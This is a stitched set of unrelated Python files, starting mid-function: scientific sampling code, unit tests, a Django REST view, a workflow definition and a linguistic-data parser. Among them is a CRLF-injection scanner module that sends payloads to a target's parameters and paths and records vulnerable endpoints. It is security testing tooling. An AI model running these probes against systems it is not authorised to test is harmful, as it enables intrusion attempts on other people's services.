            else:
                flag -= 1
            i += 1
        print(res_dic)
        res_str = ""
        # Concatenate the string collected for each row.
        for res in res_dic:
            res_str += res_dic[res]
        return res_str
import sqlite3
from sqlite3 import Error


def sql_connection():
    try:
        con = sqlite3.connect('baze1.db')
        return con
    except Error:
        print(Error)


def sql_table(con):
    cursorObj = con.cursor()
    cursorObj.execute("CREATE TABLE employees(id integer PRIMARY KEY, name text, second text, photo text)")
    con.commit()


con = sql_connection()
sql_table(con)
## ========================================================================== ##
## Copyright (c) 2019 The University of Texas at Austin. ##
## All rights reserved. ##
## ##
## Licensed under the Apache License, Version 2.0 (the "License"); ##
## you may not use this file except in compliance with the License. ##
## A copy of the License is included with this software in the file LICENSE. ##
## If your copy does not contain the License, you may obtain a copy of the ##
## License at: ##
## ##
## https://www.apache.org/licenses/LICENSE-2.0 ##
## ##
## Unless required by applicable law or agreed to in writing, software ##
## distributed under the License is distributed on an "AS IS" BASIS, WITHOUT ##
## WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ##
## See the License for the specific language governing permissions and ##
## limitations under the License.
## ## ## ## ========================================================================== ## Name = 'MH2' Label = 'MH2' Help = '' NumberOfInputs = 2 InputDataType = ['vtkPolyData', 'vtkUnstructuredGrid', 'vtkImageData'] OutputDataType = 'vtkUnstructuredGrid' ExtraXml = '' Properties = dict( arrayName = 'timeMonthly_avg_ecosysTracers_DON', nmisses = 10, nsamples = 10000, nstarts = 10, power = 1.0, sscale = 10000, max_loop_count = 100000, minvalue = -1.0, every = 10, ) def RequestData(): import vtk import random import numpy as np from vtk.numpy_interface import dataset_adapter as dsa import paraview.vtk.util.numpy_support as vnp def P(v): if v < 0: return 0 if power != 1.0: try: pv = pow(v, power) return pv except: print('E', v, power) return 0 else: return v class Interpolator: def __init__(self, dset): self.dset = dset.VTKObject self.xyz = [-10000, -20000, -30000] self.pids = vtk.reference([0]*10) self.nverts = -1 self.pc = [0]*3 self.wts = [0]*10 self.gc = vtk.vtkGenericCell() self.sid = 2 if self.dset.IsA('vtkUnstructuredGrid'): self.locator = vtk.vtkCellTreeLocator() self.locator.SetDataSet(dset.VTKObject) self.locator.BuildLocator() self.is_vtu = True else: self.is_vtu = False def Locate(self, xyz): if self.is_vtu: cid = self.locator.FindCell(xyz, 0.0, self.gc, self.pc, self.wts) if cid < 0 or min(self.wts[:4]) < 0 or max(self.wts[:4]) > 1: self.xyz = [] return False idl = vtk.vtkIdList() self.dset.GetCellPoints(cid, idl) self.ids = [idl.GetId(i) for i in range(idl.GetNumberOfIds())] else: vox = self.dset.FindAndGetCell(xyz, None, 0, 0.0, vtk.reference(self.sid), self.pc, self.wts) if vox == None: self.xyz = [] return None self.ids = [vox.GetPointId(i) for i in range(vox.GetNumberOfPoints())] self.xyz = xyz return True def Interpolate(self, xyz, a): if list(xyz) != list(self.xyz): if not self.Locate(xyz): return None if len(a.shape) == 1: return sum(self.wts[i]*a[self.ids[i]] for i in range(len(self.ids))) else: return [sum(self.wts[i]*a[self.ids[i]][j] for i in range(len(self.ids))) for j in range(a.shape[1])] class Samples: def __init__(self, dset): self.points = [] self.vars = [] self.V = [] self.PV = [] self.I = [] # for i in dset.PointData.keys(): # self.vars.append([i, dset.PointData[i], []]) def num(self): return len(self.points) def add(self, I, p, v, pv, i): err = 0 # vals = [] # for var in self.vars: # value = I.Interpolate(p, var[1]) # if value == None: # value = -99999 # vals.append(value) if err == 0: self.points.append(p) self.V.append(v) self.PV.append(pv) self.I.append(i) # for j,var in enumerate(self.vars): # print("XXX", var[0], j) # var[2].append(vals[j]) def stuff_vtu(self, outpt): outpt.SetPoints(dsa.VTKArray(np.array(self.points).astype('f4'))) outpt.PointData.append(dsa.VTKArray(np.array(self.V).astype('f4')), 'V') outpt.PointData.append(dsa.VTKArray(np.array(self.PV).astype('f4')), 'PV') outpt.PointData.append(dsa.VTKArray(np.array(self.I).astype('f4')), 'I') ct = dsa.numpyTovtkDataArray(np.array([vtk.VTK_VERTEX]*outpt.GetNumberOfPoints()).astype('u1')) co = dsa.numpy_support.numpy_to_vtkIdTypeArray(np.array(range(0, 2*outpt.GetNumberOfPoints(), 2))) ca = vtk.vtkCellArray() for i in range(outpt.GetNumberOfPoints()): ca.InsertNextCell(1, [i]) outpt.VTKObject.SetCells(ct, co, ca) # for v in self.vars: # outpt.PointData.append(dsa.VTKArray(np.array(v[2]).astype('f4')), v[0]) np.random.seed(12346) volume = inputs[0] if volume.VTKObject.IsA('vtkImageData'): is_vtu = False elif volume.VTKObject.IsA('vtkUnstructuredGrid'): is_vtu = True else: print('wha?') return samples 
= Samples(volume) interp = Interpolator(volume) # This stuff thresholds out the part of the incoming dataset that at or above the selected # minvalue, then selects one initial point in each connected component of the result tf = vtk.vtkThreshold() tf.SetInputData(volume.VTKObject) tf.SetInputArrayToProcess(0, 0, 0, vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS, arrayName) tf.ThresholdByUpper(minvalue) cf = vtk.vtkConnectivityFilter() cf.SetInputConnection(tf.GetOutputPort()) cf.SetExtractionModeToAllRegions(); cf.ColorRegionsOn(); cf.Update(); components = dsa.WrapDataObject(cf.GetOutput()) rids = components.PointData['RegionId'] n,i = np.unique(rids, return_index=True) maxvalue = np.max(components.PointData[arrayName]) array = (components.PointData[arrayName] - minvalue) / (maxvalue - minvalue) initial_points = [] initial_pqs = [] for rid in n: selectors = rids == rid region_v = array[selectors] region_p = components.Points[selectors] max_v = np.max(region_v) max_i = np.argmax(region_v == max_v) p = region_p[max_i] v = region_v[max_i] pv = P(v) print('RID', rid, 'v', v) initial_points.append(p) initial_pqs.append(pv) if np.random.rand() < pv: samples.add(interp, p, v, pv, -1) current_points = list(initial_points) current_pqs = list(initial_pqs) misses = [0]*len(initial_points) steps = [0]*len(initial_points) print('current_points', current_points) print('current_pqs', current_pqs) done = False indx = 0 accept_count = 0 loop_count = 0 while not done and samples.num() < nsamples: loop_count = loop_count + 1 if loop_count % 1000 == 0: print(loop_count) if loop_count > max_loop_count: print("broke on total loop count") done = True if misses[indx] >= nmisses: misses[indx] = 0 current_points[indx] = initial_points[indx] current_pqs[indx] = initial_pqs[indx] cpoint = current_points[indx] + np.random.normal(loc=0.0, scale=sscale, size=3) cv = interp.Interpolate(cpoint, array) # print(cpoint, cv) if not cv: # samples.add(interp, cpoint, -2, -2, -2) continue cq = P(cv) accept = 0 if cq >= current_pqs[indx]: accept = 1 misses[indx] = 0 else: u = np.random.rand() if u < cq/current_pqs[indx]: accept = 1 misses[indx] = 0 else: accept = 0 misses[indx] = misses[indx] + 1 if accept: if accept_count % every == 0: samples.add(interp, cpoint, cv, cq, steps[indx]) misses[indx] = 0 steps[indx] = steps[indx] + 1 current_points[indx] = list(cpoint) current_pqs[indx] = cq accept_count = accept_count + 1 indx = indx + 1 if indx >= len(misses): indx = 0 samples.stuff_vtu(output) return # from sklearn.metrics import r2_score def r2_adj(y_true, y_pred, dim0, dim1): r2 = r2_score(y_true, y_pred) result = 1 - (1 - r2) * (dim0 - 1) / (dim0 - dim1 -1) return result 1-10 import os, threading, time, subprocess running = True index = 0 chars = ('-', '\\', '|', '/') def spin(text): time.sleep(.1) global index while running: print('\r' + text + chars[index], end='') index += 1 if index == len(chars): index = 0 time.sleep(.1) def display_spinner_while(text, function): threading.Thread(target=spin, args=(text,)).start() function() global running running = False def pull(): os.system('git pull') display_spinner_while('Updating repository ', pull) print('\r Update complete!') def doit_windows(): subprocess.call(['depinstaller.bat']) def doit_mac_linux(): subprocess.call(['sudo', 'depinstaller.sh']) if __name__ == '__main__': os_name = os.name if os_name == 'nt': display_spinner_while('Installing dependencies ', doit_windows) time.sleep(1) print('\r Installed dependencies') os.system('python __main__.py') elif os_name == 'posix': 
display_spinner_while('Installing dependencies ', doit_mac_linux) time.sleep(1) print('\r Installed dependencies') os.system('python3 __main__.py') else: display_spinner_while('Installing dependencies ', doit_mac_linux) time.sleep(1) print('\r Installed dependencies') os.system('python3 __main__.py') # Copyright 2021 Rikai Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from rikai.parquet.shuffler import RandomShuffler def shuffle_numbers(shuffler, numbers): returned = [] for i in numbers: shuffler.append(i) while shuffler.full(): returned.append(shuffler.pop()) while shuffler: returned.append(shuffler.pop()) return returned def test_randomness(): shuffler = RandomShuffler(16) expected = list(range(100)) actual = shuffle_numbers(shuffler, expected) assert len(actual) == 100 assert expected != actual assert expected == sorted(actual) def test_randomness_with_large_capacity(): """Test the case that the capacity is larger than total number of elements. """ shuffler = RandomShuffler(128) expected = list(range(100)) actual = shuffle_numbers(shuffler, expected) assert len(actual) == 100 assert expected != actual assert expected == sorted(actual) def test_fifo(): shuffler = RandomShuffler(capacity=1) returned = shuffle_numbers(shuffler, range(100)) assert len(returned) == 100 def test_fifo_with_single_item(): shuffler = RandomShuffler(capacity=1) shuffler.append(1) assert shuffler assert shuffler.full() assert len(shuffler) == 1 assert shuffler.pop() == 1 assert not shuffler.full() import re; from sklearn.feature_extraction.text import CountVectorizer; from collections import Counter; import pandas as pd; documents = ['Hello, how are you!', 'Win money, win from home.', 'Call me now.', 'Hello, Call hello you tomorrow?']; for document in documents: tokens = []; for word in re.split(r'\s+', re.sub(r'[^a-z|\s]', '', document.lower())): tokens.append(word); print(Counter(tokens)); count_vector = CountVectorizer(token_pattern='(?u)\\b\\w\\w+\\b'); count_vector.fit(documents); print(count_vector.get_feature_names()); doc_array = count_vector.transform(documents).toarray(); print(doc_array); frequency_matrix = pd.DataFrame(data=doc_array, columns=count_vector.get_feature_names()); print(frequency_matrix);#!/usr/bin/python # coding: utf-8 import numpy as np import unittest from neural_aide.threesetsmetric import posregion class PosRegionTest(unittest.TestCase): def setUp(self): pass def test_pos_region_compile_error(self): points = np.array([ [0, 0], [0.1, 1], ]) with self.assertRaises(ValueError): posregion.PosRegion(points) def test_2D_pos_region_good_number_of_facets(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) self.assertEqual(3, len(test.facets)) def test_3D_pos_region_good_number_of_facets(self): points = np.array([ [0.2, 0.2, 0.2], [0.1, 1, 0.1], [1, 0.1, 0.3], [0.3, 0.3, 1] ]) test = posregion.PosRegion(points) self.assertEqual(4, len(test.facets)) def test_2D_pos_region_contain(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = 
posregion.PosRegion(points) ref = np.array([0.5, 0.5]) self.assertTrue(test.contain(ref)) def test_2D_pos_region_not_contain(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) ref = np.array([1, 1]) self.assertFalse(test.contain(ref)) def test_2D_pos_region_add_vertex(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) test.add_vertex(np.array([1.1, 1.1])) ref = np.array([1, 1]) self.assertTrue(test.contain(ref)) def test_2D_pos_region_add_vertex(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) test.add_vertex(np.array([-0.1, -0.1])) ref = np.array([0, 0]) self.assertTrue(test.contain(ref)) def test_2D_pos_region_clean_vertex(self): points = np.array([ [0.2, 0.2], [0.1, 1], [1, 0.1], ]) test = posregion.PosRegion(points) test.add_vertex(np.array([-0.1, -0.1])) self.assertEqual(test.vertices.shape[0], 3) if __name__ == "__main__": unittest.main() gatewaymanish/astra_python3 import requests import os from urllib.parse import urlparse import urllib.parse from utils.db import Database_update from . import sendrequest as req dbupdate = Database_update() def fetch_crlf_payload(): # This function fetch the payloads from text file. payload_list = [] if os.getcwd().split('/')[-1] == 'API': path = '../Payloads/crlf.txt' else: path = 'Payloads/crlf.txt' with open(path) as f: for line in f: if line: payload_list.append(line.rstrip()) return payload_list def crlf_post_method(uri,method,headers,body,scanid=None): # This function checks CRLF through POST method. temp_body = {} for key,value in list(body.items()): crlf_payloads = fetch_crlf_payload() for payload in crlf_payloads: temp_body.update(body) temp_body[key] = payload crlf_post_request = req.api_request(uri, "POST", headers, temp_body) for name in crlf_post_request.headers: if "CRLF-Test" in name: attack_result = { "id" : 13, "scanid" : scanid, "url" : uri, "alert": "CRLF injection", "impact": "High", "req_headers": headers, "req_body": temp_body, "res_headers": crlf_post_request.headers ,"res_body": crlf_post_request.text} dbupdate.insert_record(attack_result) print("[+]{0} is vulnerable to CRLF injection".format(uri)) return def crlf_get_uri_method(uri,method,headers,scanid=None): # This function checks CRLF through GET URI method. par_key = {} url_query = urllib.parse.urlparse(uri) parsed_query = urllib.parse.parse_qs(url_query.query) for key,value in list(parsed_query.items()): crlf_payloads = fetch_crlf_payload() for payload in crlf_payloads: par_key.update(parsed_query) par_key[key] = payload parsed_uri = urllib.parse.urlparse(uri).scheme+"://"+urllib.parse.urlparse(uri).netloc+urllib.parse.urlparse(uri).path+"?"+urllib.parse.urlparse(uri).query.replace(value[0], payload) crlf_get_method = req.api_request(parsed_uri, "GET", headers) for name in crlf_get_method.headers: if "CRLF-Test" in name: attack_result = { "id" : 13, "scanid" : scanid, "url" : parsed_uri, "alert": "CRLF injection", "impact": "High", "req_headers": headers, "req_body":"NA", "res_headers": crlf_get_method.headers ,"res_body": crlf_get_method.text} dbupdate.insert_record(attack_result) print("[+]{0} is vulnerable to CRLF injection".format(parsed_uri)) return def crlf_get_url_method(uri,headers,scanid=None): # This function checks CRLF through GET URL method. 
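    # Each payload from Payloads/crlf.txt is appended to the URL path as an
    # extra segment; if the response comes back with a header whose name
    # contains "CRLF-Test", the injected CR/LF reached the response headers
    # and the endpoint is recorded as vulnerable.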
crlf_payloads = fetch_crlf_payload() for payload in crlf_payloads: parsed_uri = urllib.parse.urlparse(uri).scheme+"://"+urllib.parse.urlparse(uri).netloc+urllib.parse.urlparse(uri).path+"/"+payload crlf_get_method = req.api_request(parsed_uri, "GET", headers) for name in crlf_get_method.headers: if "CRLF-Test" in name: attack_result = { "id" : 13, "scanid" : scanid, "url" : parsed_uri, "alert": "CRLF injection", "impact": "High", "req_headers": headers, "req_body":"NA", "res_headers": crlf_get_method.headers ,"res_body": crlf_get_method.text} dbupdate.insert_record(attack_result) print("[+]{0} is vulnerable to CRLF injection".format(parsed_uri)) return def crlf_check(uri,method,headers,body,scanid): # Main function for CRLF attack if method == 'GET' or method == 'DEL': crlf_get_uri_method(uri,method,headers,scanid) crlf_get_url_method(uri,headers,scanid) if method == 'POST' or method == 'PUT': crlf_post_method(uri,method,headers,body,scanid) coll-gate/collgateserver/classification/classificationentrysynonym.py # -*- coding: utf-8; -*- # # @file classificationentrysynonym.py # @brief Views related to the classification entry synonym model. # @author (INRA UMR1095) # @date 2016-09-01 # @copyright Copyright (c) 2016 INRA/CIRAD # @license MIT (see LICENSE file) # @details from django.core.exceptions import SuspiciousOperation from django.db import IntegrityError from django.db import transaction from django.db.models import Q from django.shortcuts import get_object_or_404 from django.views.decorators.cache import cache_page from django.utils.translation import ugettext_lazy as _ from classification import localsettings from igdectk.rest.handler import * from igdectk.rest.response import HttpResponseRest from main.models import EntitySynonymType from .models import ClassificationEntrySynonym, ClassificationEntry from .base import RestClassification from .classificationentry import RestClassificationEntry, RestClassificationEntryId class RestClassificationEntrySynonym(RestClassificationEntry): regex = r'^synonym/$' suffix = 'synonym' class RestClassificationEntrySynonymSearch(RestClassificationEntrySynonym): regex = r'^search/$' suffix = 'search' class RestClassificationEntryIdSynonym(RestClassificationEntryId): regex = r'^synonym/$' suffix = 'synonym' class RestClassificationEntryIdSynonymId(RestClassificationEntryIdSynonym): regex = r'^(?P[0-9]+)/$' suffix = 'id' @RestClassificationEntrySynonymSearch.def_auth_request(Method.GET, Format.JSON, ('filters',)) def search_classification_entry_synonym(request): """ Quick search for a classification entry synonym with a exact or partial name. 
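
    Expected GET parameters (as read by the handler body below): 'filters',
    a JSON object with a 'fields' list and optional 'name'/'method',
    'synonym_type'/'synonym_type_method' and 'language'/'language_method'
    entries; 'more', the page size (default 30); and 'cursor', a JSON
    [name, id] pair used for keyset pagination on (name, id).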
""" filters = json.loads(request.GET['filters']) results_per_page = int_arg(request.GET.get('more', 30)) cursor = request.GET.get('cursor') limit = results_per_page if cursor: cursor = json.loads(cursor) cursor_name, cursor_id = cursor qs = ClassificationEntrySynonym.objects.filter(Q(name__gt=cursor_name) | ( Q(name=cursor_name) & Q(id__gt=cursor_id))) else: qs = ClassificationEntrySynonym.objects.all() if 'name' in filters['fields']: name_method = filters.get('method', 'ieq') if name_method == 'ieq': qs = qs.filter(name__iexact=filters['name']) elif name_method == 'icontains': qs = qs.filter(name__icontains=filters['name']) if 'synonym_type' in filters['fields']: st_method = filters.get('synonym_type_method', 'eq') if st_method == 'eq': qs = qs.filter(synonym_type_id=filters['synonym_type']) # elif st_method == 'in': # qs = qs.filter(synonym_type_id__in=filters['synonym_type']) if 'language' in filters['fields']: method = filters.get('language_method', 'eq') if method == 'eq': qs = qs.filter(language=filters['language']) elif method == 'neq': qs = qs.exclude(language=filters['language']) qs = qs.order_by('name', 'id')[:limit] items_list = [] for synonym in qs: s = { 'id': synonym.id, 'value': synonym.id, 'label': synonym.name, 'synonym_type': synonym.synonym_type_id, 'classification_entry': synonym.entity_id } items_list.append(s) if len(items_list) > 0: # prev cursor (asc order) obj = items_list[0] prev_cursor = (obj['label'], obj['id']) # next cursor (asc order) obj = items_list[-1] next_cursor = (obj['label'], obj['id']) else: prev_cursor = None next_cursor = None results = { 'perms': [], 'items': items_list, 'prev': prev_cursor, 'cursor': cursor, 'next': next_cursor, } return HttpResponseRest(request, results) @RestClassificationEntryIdSynonym.def_auth_request( Method.POST, Format.JSON, content={ "type": "object", "properties": { "synonym_type": {"type:": "number"}, "language": ClassificationEntrySynonym.LANGUAGE_VALIDATOR, "name": ClassificationEntrySynonym.NAME_VALIDATOR }, }, perms={ 'classification.change_classificationentry': _("You are not allowed to modify a classification entry"), 'classification.add_classificationentrysynonym': _("You are not allowed to add a synonym to a classification entry"), } ) def classification_entry_add_synonym(request, cls_id): classification_entry = get_object_or_404(ClassificationEntry, id=int(cls_id)) # check that type is in the values of descriptor synonym_type = get_object_or_404(EntitySynonymType, id=int_arg(request.data['synonym_type'])) entity_synonym = ClassificationEntrySynonym.add_entity_synonym( classification_entry, synonym_type, request.data['name'], request.data['language']) result = { 'id': entity_synonym.pk, 'synonym_type': entity_synonym.synonym_type_id, 'name': entity_synonym.name, 'language': entity_synonym.language } return HttpResponseRest(request, result) @RestClassificationEntryIdSynonymId.def_auth_request( Method.PUT, Format.JSON, content={ "type": "object", "properties": { "name": ClassificationEntrySynonym.NAME_VALIDATOR }, }, perms={ 'classification.change_classificationentry': _("You are not allowed to modify a classification entry"), 'classification.change_classificationentrysynonym': _("You are not allowed to modify a synonym to a classification entry"), } ) def classification_entry_change_synonym(request, cls_id, syn_id): classification_entry = get_object_or_404(ClassificationEntry, id=int(cls_id)) classification_entry_synonym = classification_entry.synonyms.get(id=int(syn_id)) name = request.data['name'] # no changes 
    if name == classification_entry_synonym.name:
        return HttpResponseRest(request, {})

    ClassificationEntrySynonym.rename(classification_entry, classification_entry_synonym, name)

    result = {
        'id': classification_entry_synonym.id,
        'name': name
    }

    return HttpResponseRest(request, result)


@RestClassificationEntryIdSynonymId.def_auth_request(
    Method.DELETE, Format.JSON,
    perms={
        'classification.change_classificationentry': _("You are not allowed to modify a classification entry"),
        'classification.delete_classificationentrysynonym': _("You are not allowed to delete a synonym from a classification entry"),
    }
)
def classification_entry_remove_synonym(request, cls_id, syn_id):
    synonym = get_object_or_404(ClassificationEntrySynonym, Q(id=int(syn_id)), Q(entity=int(cls_id)))

    if synonym.synonym_type_id == localsettings.synonym_type_classification_entry_name:
        raise SuspiciousOperation(_("It is not possible to remove a primary synonym"))

    synonym.delete()

    return HttpResponseRest(request, {})
maartenJacobs/gadk
from gadk import *


class MyService(Workflow):
    def __init__(self) -> None:
        super().__init__("my_service", "my service workflow")

        paths = [
            "src/service/*.py",
            "src/service.yml",
        ]
        self.on(
            pull_request=On(paths=paths),
            push=On(branches=["master"], paths=paths),
        )

        self.jobs["test"] = Job(
            steps=[RunStep("make build"), RunStep("make lint"), RunStep("make test"),],
        )
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================ """Tests for TFP-internal random samplers.""" from absl import flags from absl.testing import parameterized import numpy as np import tensorflow.compat.v2 as tf from tensorflow_probability.python.internal import samplers from tensorflow_probability.python.internal import test_util flags.DEFINE_enum('test_tfp_jax_prng', 'default', ['default', 'rbg'], 'Which PRNG implementation to test with.') FLAGS = flags.FLAGS JAX_MODE = False NUMPY_MODE = False @test_util.test_all_tf_execution_regimes class RandomTest(test_util.TestCase): def setUp(self): super().setUp() if JAX_MODE and FLAGS.test_tfp_jax_prng != 'default': from jax.config import config # pylint: disable=g-import-not-at-top config.update('jax_enable_custom_prng', True) config.update('jax_default_prng_impl', FLAGS.test_tfp_jax_prng) @test_util.substrate_disable_stateful_random_test def test_sanitize_int(self): seed1 = samplers.sanitize_seed(seed=123) seed2 = samplers.sanitize_seed(seed=123) if tf.executing_eagerly(): self.assertNotAllEqual(seed1, seed2) else: self.assertAllEqual(seed1, seed2) @test_util.substrate_disable_stateful_random_test def test_sanitize_then_split_equivalent_split_int(self): seed = test_util.test_seed() sanitized = samplers.sanitize_seed(seed, salt='please pass the') s1 = samplers.split_seed(sanitized, n=3) if tf.executing_eagerly(): tf.random.set_seed(seed) s2 = samplers.split_seed(seed, n=3, salt='please pass the') self.assertAllAssertsNested(self.assertAllEqual, s1, s2) @test_util.substrate_disable_stateful_random_test def test_sanitize_none(self): seed1 = samplers.sanitize_seed(seed=None) seed2 = samplers.sanitize_seed(seed=None) self.assertNotAllEqual(seed1, seed2) def test_sanitize_tensor_or_tensorlike(self): seed = test_util.test_seed(sampler_type='stateless') seed1 = samplers.sanitize_seed(seed=self.evaluate(seed)) seed2 = samplers.sanitize_seed(seed) seed1, seed2 = self.evaluate([seed1, seed2]) self.assertSeedsEqual(seed1, seed2) seed3 = samplers.sanitize_seed([0, 1]) seed4 = samplers.sanitize_seed(np.array([0, 1])) seed3, seed4 = self.evaluate([seed3, seed4]) self.assertSeedsEqual(seed3, seed4) def test_split(self): seed = test_util.test_seed(sampler_type='stateless') seed1, seed2 = samplers.split_seed(seed) seed3, seed4 = samplers.split_seed(seed) seed, seed1, seed2, seed3, seed4 = self.evaluate( [seed, seed1, seed2, seed3, seed4]) self.assertSeedsNotEqual(seed, seed1) self.assertSeedsNotEqual(seed, seed2) self.assertSeedsNotEqual(seed1, seed2) self.assertSeedsEqual(seed1, seed3) self.assertSeedsEqual(seed2, seed4) def test_salted_split(self): seed = test_util.test_seed(sampler_type='stateless') seed1, seed2 = samplers.split_seed(seed, salt='normal') seed3, seed4 = samplers.split_seed(seed, salt='lognormal') seed, seed1, seed2, seed3, seed4 = self.evaluate( [seed, seed1, seed2, seed3, seed4]) self.assertSeedsNotEqual(seed, seed1) self.assertSeedsNotEqual(seed, seed2) self.assertSeedsNotEqual(seed1, seed2) self.assertSeedsNotEqual(seed1, seed3) self.assertSeedsNotEqual(seed2, seed4) self.assertSeedsNotEqual(seed3, seed4) @parameterized.named_parameters( dict(testcase_name='_categorical', sampler=samplers.categorical, kwargs=dict(logits=[[1, 1.05, 1]], num_samples=5)), dict(testcase_name='_gamma', sampler=samplers.gamma, kwargs=dict(shape=[2, 3], alpha=[.5, 1, 2.2], beta=0.75)), dict(testcase_name='_normal', sampler=samplers.normal, kwargs=dict(shape=[2])), dict(testcase_name='_poisson', sampler=samplers.poisson, 
kwargs=dict(shape=[2, 3], lam=[1.5, 5.5, 8.5])), dict(testcase_name='_poisson_scalar', sampler=samplers.poisson, kwargs=dict(shape=[], lam=[1.5, 5.5, 8.5])), dict(testcase_name='_shuffle', sampler=samplers.shuffle, kwargs=dict(value=list(range(10)))), dict(testcase_name='_uniform', sampler=samplers.uniform, kwargs=dict(shape=[2]))) def test_sampler(self, sampler, kwargs): if FLAGS.test_tfp_jax_prng == 'rbg' and sampler == samplers.gamma: self.skipTest('gamma sampler not implemented for rbg PRNG.') seed = test_util.test_seed(sampler_type='stateless') s1 = sampler(seed=seed, **kwargs) s2 = sampler(seed=seed, **kwargs) self.assertAllEqual(s1, s2) # We don't test these scenarios for numpy, jax, where we don't support # stateful sampling. if not JAX_MODE and not NUMPY_MODE: self.verify_tf_behavior_match(sampler, kwargs) def verify_tf_behavior_match(self, sampler, kwargs): s1 = sampler(seed=123, **kwargs) s2 = sampler(seed=123, **kwargs) tf_sampler = getattr(tf.random, sampler.__name__) tf_s1 = tf_sampler(seed=123, **kwargs) tf_s2 = tf_sampler(seed=123, **kwargs) if tf.executing_eagerly(): self.assertNotAllEqual(s1, s2) self.assertNotAllEqual(tf_s1, tf_s2) else: self.assertAllEqual(s1, s2) self.assertAllEqual(tf_s1, tf_s2) if __name__ == '__main__': test_util.main() import re import pathlib import collections from pybtex import database from clld.lib.bibtex import unescape from clldutils.text import split_text, split_text_with_context from csvw.dsv import reader from cldfbench import Dataset as BaseDataset, CLDFSpec from pycldf.sources import Source GB_LANGUAGE_MAP = { #GB - UT # Central Mansi [cent2322] #Komi-Permyak [komi1269] # Ume Saami [umes1235] 'gras1239': 'east2328', 'kama1378': 'kama1351', 'voro1241': 'sout2679', 'west2392': 'kozy1238', } def read(p, **kw): return list(reader(p, dicts=True, **kw)) def gb_codes(s): s = s.replace('multistate', '').strip() for code in split_text(s, separators=',;'): n, label = code.strip().split(':') assert isinstance(int(n), int), s yield n.strip(), label.strip() def fix_internal_stress(s): import unicodedata def is_letter(c): return c and unicodedata.category(c)[0] == 'L' new, last = [], None for i, c in enumerate(s): next = s[i + 1] if i + 1 < len(s) else None if c == "'" and is_letter(next) and is_letter(last): c = '\u02c8' new.append(c) last = c return ''.join(new) def check_example(p, d): ex = d['Example'].strip() if ex and ex.lower() not in ['example', 'examples']: ut_id = int(d["ID"].split('UT')[1]) # ignore all the examples of phonological features in UT if 116 <= ut_id <= 166: # parse multiple phonological (onw-word) examples of the following types: """ Lule_Saami.csv:UT154:misformatted IGT: "vuossja [vuoʃʃa] boil.CNG vs. 
vuossa [vuossa] bag.GEN.SG" Lule_Saami.csv:UT155:misformatted IGT: "biebbmo [pieb:muo] 'food', soabbe [soab:bie] 'walking stick'" """ refp = re.compile("\((?P[^)]+)\)") transp = re.compile("['’‘](?P[^'’]+)['’]") ex2 = fix_internal_stress(ex.replace("['", "[\u02c8")) phonemicp = re.compile(r"\s+/(?P[^/]+)/\s+") parsed = [] for e in split_text_with_context( ex2.replace("vs.", ",").replace('→', ',').replace(' : ', ' , ').replace('\n', ',').replace(' > ', ' , '), separators=",;", brackets={"'": "'", "’": "’", "[": "]", "‘": "’"}): word, morphemes, trans, gloss, phonemic, ref_or_comment = '', '', '', '', '', '' m = refp.search(e) if m: ref_or_comment = m.group('ref') e = refp.sub('', e).strip() if '/' in e and ('[' not in e): e = phonemicp.sub(lambda m: " [{}] ".format(m.group('ipa')), e) m = phonemicp.search(e) if m: phonemic = m.group('ipa') e = phonemicp.sub('', e).strip() tokens = collections.Counter(list(e)) if tokens['['] == 1 and tokens[']'] == 1: # IPA morphemes word_morphemes, rem = e.split(']') word, morphemes = word_morphemes.split('[') rem = rem.strip() m = transp.search(rem) if m: trans = m.group('trans') gloss = transp.sub('', rem).strip() else: gloss = rem #print("{} - {} - {} - {}".format(word.strip(), morphemes.strip(), gloss, trans)) else: if e.endswith('.'): e = e[:-1].strip() m = transp.search(e) if m and m.end() == len(e): # We got a translation e = transp.sub('', e).strip() trans = m.group('trans') comps = e.split() if len(comps) == 1: word = morpheme = comps[0] elif len(comps) == 2 and re.search(r'[A-Z]+', comps[1]): # two words and the second contains uppercase letters. Assume the # second to be the gloss. word = morphemes = comps[0] gloss = comps[1] else: print('----- {} -- {}'.format(e, ex)) parsed = [] break # FIXME: add phonemic transcription! parsed.append(( word.strip(), morphemes, gloss, trans, '({})'.format(ref_or_comment) if ref_or_comment else '')) for pp in parsed: yield pp if not parsed: yield (ex, '', '', '', '') else: done = False try: if '|' in ex and ';' in ex: try: parsed = [] for e in ex.split('|'): pt, g, t, c = e.split(';') if '[' in pt: pt, _, an = pt.partition('[') pt = pt.strip() an = an.replace(']', '').strip() else: an = pt if g: assert len(an.strip().split()) == len(g.strip().split()) parsed.append((pt, an.strip().split(), g.strip().split() if g else [], t, c)) done = True for pp in parsed: yield pp except: #raise pass if not done: # analyzed, gloss, translation = ex.split( # '\n' if '\n' in ex else ';')[:3] analyzed, gloss, translation = re.split(r'\n|;', ex)[:3] ipa = None if '[' in analyzed: analyzed, _, ipa = analyzed.partition('[') analyzed = analyzed.strip() ipa = ipa.replace(']', '').strip() analyzed, ipa = ipa, analyzed a = analyzed.strip().split() g = gloss.strip().split() if len(a) != len(g): if g: print('{}:{}:morphemes/gloss mismatch: "{}" - "{}"'.format(p.name, d['ID'], ' '.join(a), ' '.join(g))) # print(a) # print(g) # print('---') raise ValueError() yield (ipa or ' '.join(analyzed), analyzed, gloss, translation, '') except: 